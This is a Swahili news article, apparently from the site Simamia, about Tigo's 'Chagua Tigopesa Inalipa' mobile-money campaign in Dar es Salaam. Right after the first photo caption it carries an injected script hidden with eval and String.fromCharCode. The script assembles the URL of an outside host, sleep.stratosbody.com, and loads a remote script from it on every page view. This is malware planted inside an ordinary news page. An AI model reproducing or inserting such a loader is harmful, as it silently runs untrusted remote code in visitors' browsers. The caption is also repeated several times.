Recent Comments

Tigo yazindua huduma mpya

By Baraka Bitariho Aug 27, 2015
<p>Mkuu wa Huduma za fedha kwa njia ya simu wa Kampuni ya simu ya Tigo, Ruan Swanepoel akizungumza na waandishi wa habari wakati wa uzinduzi wa kampeni ya Chagua Tigopesa Inalipa ya kampuni hiyo, Dar es Salaam jana. Kulia ni Meneja Chapa wa Tigo, William Mpinga.</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Mkuu wa Huduma za fedha kwa njia ya simu wa Kampuni ya simu ya Tigo, Ruan Swanepoel akizungumza na waandishi wa habari wakati wa uzinduzi wa kampeni ya Chagua Tigopesa Inalipa ya kampuni hiyo, Dar es Salaam jana. Kulia ni Meneja Chapa wa Tigo, William Mpinga.
Mkuu wa Huduma za fedha kwa njia ya simu wa Kampuni ya simu ya Tigo, Ruan Swanepoel akizungumza na waandishi wa habari wakati wa uzinduzi wa kampeni ya Chagua Tigopesa Inalipa ya kampuni hiyo, Dar es Salaam jana. Kulia ni Meneja Chapa wa Tigo, William Mpinga.

KAMPUNI ya simu za mkononi ya Tigo, imezindua huduma mpya iitwayo Chagua Tigopesa inalipa, yenye lengo la kuwaongezea tija watumiaji wa huduma hiyo.

Huduma hiyo ilizinduliwa na Mkuu wa Kitengo cha huduma za kifedha wa Tigo, Ruan Swanepoel aliyeeleza kuwa mteja wa Tigo anayetumia Tigo pesa atapata riba kila baada ya miezi mitatu kulingana na kiasi cha fedha alichohifadhi katika simu yake.

Alitaja huduma nyingine kuwa ni kifurushi cha bure kitakachotolewa kwa mteja atakayelipa huduma mbalimbali kwa kutumia Tigo pesa

. “Kila mteja anapomnunulia mwenzake kifurushi, atajipatia asilimia 10 ya thamani ya kifurushi atakachokuwa amemnunulia mwenzake huyo,” alisema.

Alitoa mfano kwa kusema, mteja wa Tigo akimnunulia mtu kifurushi cha Sh 10,000, atapata zawadi ya Sh 1000,” Swanepoel alisema.

Alisema, tangu mwaka jana kampuni hiyo ilipozindua huduma ya kuwagawia salio wateja wake , imekwishatoa jumla ya Sh bilioni 27. Kwa maelezo yake, huduma hiyo inayotolewa kila baada ya miezi mitatu kwa mwisho wa mwezi Julai, mwaka huu, Tigo ilitoa jumla ya Sh bilioni 3.3 kwa wateja wake.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com